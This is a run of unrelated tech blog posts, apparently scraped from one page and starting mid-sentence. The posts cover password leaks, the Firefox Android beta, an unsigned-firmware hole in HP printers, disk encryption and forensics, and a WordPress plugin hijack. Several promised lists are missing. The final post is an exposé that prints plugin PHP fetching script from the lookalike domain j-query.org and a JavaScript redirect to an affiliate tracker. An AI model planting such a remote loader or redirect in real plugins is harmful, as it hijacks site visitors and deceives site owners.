…as the company seems determined, to the point of threatening legal action, to hide information from you about how to upgrade or repair them.
If you want to spend your money with a more enlightened company, try HP, Dell or Lenovo (although apparently business laptops only, which is disappointing).
This is awesome. Well done to Oleg Romashin.
URL shortening services are very popular. They basically redirect a short URL – e.g. bit.ly/ABC123 – to a longer URL. (And keep logs, which can be monetized, hence Twitter’s t.co service and the requirement that tweets use it.) Most URL shortening services use the following set of characters in the unique tag: [A-Za-z0-9] – a total of 62. 6 characters is a normal number for the tag.
However, when reading such a short URL to someone, e.g. over the phone or across a conference table, a couple of problems can occur:
This makes reading out such short URLs a pain, as one has to make sure to specify case correctly, and to distinguish between similar-looking characters in a possibly-unfamiliar font, or in handwriting. These problems could be avoided, and URL reading would be much easier, if the set was instead [a-km-np-z0-9], and the shortener service treated a submitted tag as case-insensitive.
This would give a choice of only 34 characters. Surely that would mean the tag would have to be much longer? Actually no:
Short URLs could be made more transmittable at the cost of only being 1 character longer. I think some service might find that worth doing…
Yesterday, LinkedIn started investigating a password leak, followed by online dating site eHarmony, and now online music streaming site LastFM has announced on their blog that they too are investigating the leak of user passwords. As a precautionary measure, they are advising all their users to change their passwords immediately. You can do that here.
Yesterday, a Russian hacker reportedly stole 6.5 million LinkedIn passwords and 1.5 million passwords from eHarmony. It is not yet known if the hacking incidents are related.
It’s worth repeating the password tips my colleague Jindrich Kubec wrote in an earlier blog post.
A simple 5 step procedure for creating new passwords:
At this point, you have probably heard the news. Yes, we’ve release the first public Beta of Firefox for Android with all the goodness that we’ve been working on in the last 7 months: the brand new native UI that is lighter, faster, and sleeker. Here are some big picture highlights about this Beta.
Design direction. The new native UI design is part of a wider effort in Mozilla to streamline the visual identity of Firefox across multiple platforms—desktop and mobile. Firefox should feel like one consistent product everywhere. Have a look at Madhava’s slide deck for more information on what the Firefox design team has been up to lately.
Keep in mind that this first native UI release is just the first of many iterations. For instance, there’s a lot of interesting changes coming up as part of our work on the native tablet UI that will eventually trickle down to the phone UI as well.
Panning and zooming. If you’re using the Beta already (or have been using the Nightly or Aurora builds) you’ll notice how smoother panning and zooming are. This is because the Beta features a major revamp on the graphics and rendering infrastructure using tiled rendering and an off-main-thread layer compositor. I recommend reading Benoit Girard‘s and Chris Lord‘s blog posts for further details. It’s worth mentioning that the Mobile Platform and Graphics teams did an amazing work to implement all this in a rather short period!
Places and Sync. The Places database has been re-implemented in Firefox for Android as a private Content Provider for two reasons. First of all, it gives instant access to history and bookmarks even before Gecko is up i.e. much faster startup experience. Secondly, it allows the new native Firefox Sync—which is now nicely integrated with the system’s sync UI—to access your browsing history and bookmarks even when Firefox is not running.
We’ve already started working on new features for the following releases including the native UI for Firefox on Android tablets and a reader mode. As you can see, the upcoming Firefox for Android is a whole new beast. We are working hard to make it the best mobile browser out there. You can help us now testing the Beta as part of our Mobile Test Drivers Program!
With the native UI, we’re creating a new baseline for innovation on Firefox Mobile. And it will only get better from now on. What are you waiting for? Download the Firefox for Android Beta now!
It seems, though HP is yet to confirm it, that researchers from Columbia University have found a security hole in “tens of millions” of HP LaserJet printers that allows a remote hacker to install new and dangerous firmware on the device. In one example, the researchers used the vulnerability to hack a printer’s fuser — the heating element that bonds the toner pigment to the paper — causing the paper to turn brown and begin to smoke.
The attack vector is depressingly simple: Every time a vulnerable LaserJet printer accepts a print job, it scans that job to see if it includes a firmware update. Unvelievably, the printer doesn’t then check the source of the update; HP doesn’t digitally sign its updates, and the printer isn’t looking for HP’s signature. In other words, you can reverse engineer one of HP’s firmware updates, program your own, and then insert it into a print job. You can install whatever software you like on millions of network- and internet-connected LaserJet printers.
Beyond the terrifying burning-paper example, Columbia also showed some hacked firmware that detected when a tax return was being printed, and then extracted the Social Security number and forwarded it to a Twitter feed. Really, though, the possibilities of what a hacked printer could do are endless; it’s effectively just another computer on the network. You could make a botnet out of hacked printers, even.
Now, at first this might sound like a local vulnerability — many printers are connected to the internet via the LAN, but they’re hidden behind NAT and hard to reach — but what if an employee at a company is spear-phished with a hacked-firmware-laden PDF or DOC? The main problem, though, is that HP and its customers have no real way of patching this hole. There’s no global update that HP can trigger. Even worse, there’s no way for companies to tell if their printers have been hacked. The only real solution would be to replace every printer in the office. It’s worth noting that other (non-HP) printers, copiers, and all-in-one thingamajigs are probably vulnerable to a similar attack, too.
To be honest, we shouldn’t be surprised that such a hole exists; depressed, perhaps, but not surprised. You might not be aware, but almost every network- or internet-connected device, from a car’s on-board telematics to a self-aware refrigerator, is a computer – as in a processor, network interface, some memory, and an operating system. In the case of printers, it’s usually a computer running VxWorks or an embedded version of Linux. These devices, like your Android phone, Linux server, or Windows PC, are just as vulnerable to malware, viruses, and SQL injection. As you know, manufacturers generally take shortcuts to get their products to market sooner — and if there has never been a known case of the device being exploited, such as the case with printers, you can see why HP might skimp when it comes to security measures.
It’s a very similar story to the hackable insulin pump or opening a car door via SMS. It’s not hard to secure these systems, it just doesn’t seem like a worthwhile activity until a security researcher shows a proof-of-concept attack — and then everyone moves very, very rapidly to patch the hole before the metaphorical ship sinks. The problem here, though, is that most cases of “security through obscurity” occur in rare, off-the-grid devices. There might only be a few thousand wireless insulin pumps in the world, and they’re not connected to the internet. HP has sold 100 million LaserJet printers since 1984, and they’re all connected to the internet or a computer.
Read more at MSNBC
Update @ 15:44 ET: HP has posted a response on the situation. Basically, it suggests that every LaserJet printer has a “thermal breaker,” which would prevent paper (or the printer?) from catching fire. The rest of the release basically confirms that there’s a gaping security hole and that they’re working on a firmware fix. With no centralized update service, though, it’s safe to assume that unpatched printers will be around for years to come.
[Image credit: Chris Hills -- and that's an InkJet, not a LaserJet, incidentally]
You might be shocked to learn this, but when a quivering-lipped Chloe from 24 cracks the encryption on a terrorist’s hard drive in 30 seconds, the TV show is faking it. “So what? It’s just a TV show.” Well, yes, but it turns out that real federal intelligence agencies, like the FBI, CIA, and NSA, also have a problem cracking encrypted hard disks — and according to a new research paper, this is a serious risk to national security.
The study, titled “The growing impact of full disk encryption on digital forensics,” illustrates the difficulty that CSI teams have in obtaining enough digital data to build a solid case against criminals. According to the researchers, one of which is a member of US-CERT — the US government’s primary defense against internet and digital threats — there are three main problems with full disk encryption (FDE): First, evidence-gathering goons can turn off a computer (for transportation) without realizing it’s encrypted, and thus can’t get back at the data (unless the arrestee gives up his password, which he doesn’t have to do); second, if the analysis team doesn’t know that the disk is encrypted, it can waste hours trying to read something that’s ultimately unreadable; and finally, in the case of hardware-level disk encryption, tampering with the device can trigger self-destruction of the data.
The paper does go on to suggest some ways to ameliorate these issues, though: Better awareness at the evidence-gathering stage would help, but it also suggests “on-scene forensic acquisition” of data, which involves ripping unencrypted data from volatile, live memory (with the cryogenic RAM freezing technique, presumably). Ultimately, though, the researchers aren’t hopeful: “Research is needed to develop new techniques and technology for breaking or bypassing full disk encryption,” concludes the paper.
It’s a tough situation: On the one hand, being able to crack full disk encryption is vital for the prosecution of white-collar criminals, child porn ringleaders, pharmaceutical spam barons, and the curtailment of terrorism — but on the other, it’s quite satisfying to know that, perhaps at long last, we have a way of escaping the ireful eye of Big Brother. Where do you stand on FDE?
Read more at ScienceDirect
We received an email today from a WordPress user who wanted to alert us to a jQuery hack. At first, I’ve got to admit, I was a little bit sceptical but I thought it was worth looking in to. I was surprised by what I found.
We all love jQuery – sometimes I like to daydream about marrying it in some sort of exotic ceremony in Barbados. In fact, it’s so awesome that it’s become a little bit ubiquitous. There are so many plugins using jQuery that we’re totally used to finding it in them.
Normally a WordPress plugin will get jQuery from just a few places:
But what if you had a plugin that was getting it’s jQuery from http://j-query.org?
That seems pretty legit, right? I mean it’s got j-query in the damned domain! And when you visit it, you end up at http://jquery.org – the official site of jQuery.
Oh… wait…. http://j-query.org and http://jquery.org – they’re not the same, are they?
No, they’re not. And http://j-query.org isn’t even registered by the people at jquery. It’s registered with domains by proxy, and forwards to servers at Media Temple.
So it’s got to be suspicious when you find three WordPress plugins that all contain this piece of code:
if(function_exists('curl_init'))
{
$url = "http://www.j-query.org/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
There are three plugins containing this code. They are:
All three of these plugins are from the same person – iintensemedia who runs the site Iintense Media (also registered by domain by proxy, nameservers at Media Temple – doesn’t mean anything, am just sayin’, right?).
Let’s take a look at one of these in trac:
Now, I expect you’ll go running off to that j-query link and then you’ll come running back and be all “Siobhan!” (and btw, it’s pronounced Shavonne – get it right before you shout at me plz. anyway…..) “Siobhan! It’s just a blank page! WTF?”
Yes, I am aware of that – it looks like the offending js has been removed. But a little bit of investigation tells us what it does.
Check out this forum thread in which the excited alexpike mentions to the dev that the plugin inserts the following into his header:
<script type = "text/javascript">
var now = new Date().getTime();
if (now%8 == 0) {
window.location = "http://trk.cpainfinity.com/SHD1";
}
</script>
How does the dev respond?
That’s not the only place where someone posted about noticing strange JS being added to their website. A member of the Black Hat World Forums was concerned when his website was hacked.
The member said that this file: http://www.j-query.org/jquery-1.6.4.min.js was propogating this site with CPA Infinity Affiliate links. CPA Infinity? Where have we seen that before? In the first clue, dingbats. These are affiliate backlinks to CPA Infinity.
Which means that someone has been making money with some fake http://j-query.org site which is fooling people into thinking that they’re getting some delicious jQuery but they’re actually sending about 1 in every 8 of your visitors to the CPA Infinity link.
Anyway, CPA Infinity didn’t seem to be too impressed about it as their founder has banned the user. Perhaps that’s why the js file is no longer working.
Update: A commenter has noted this link.
Obviously I couldn’t say. Iintensemedia seems like a good community-minded guy who is always looking for orphaned plugins to adopt. And not at all interested in Black Hat SEO:
Well kids, every good story has got a good moral, and this one does too.
The WordPress Plugin Directory is not infalliable. Things get in that can exploit your WordPress website. We’ve written about this before. Unfortunately it’s the case that while the Theme Directory has got strict review guidelines and a committed review team, the Plugin Directory has nothing comparable. We all trust the plugin directory implicitly (we recommended one of the above plugins ourselves) but maybe we aren’t right to do so. Our assumption that the plugin directory is the safest place to get a plugin from maybe isn’t correct. The plugin directory most definitely has its weaknesses, and its weaknesses are the weaknesses of everyone who runs their website on WordPress.
Install some security plugins to keep watch on your site, and be careful where you get your scripts from – you never know what you might catch! ;)
Were you affected by any of these plugins? We’d love to hear your story in the comments.
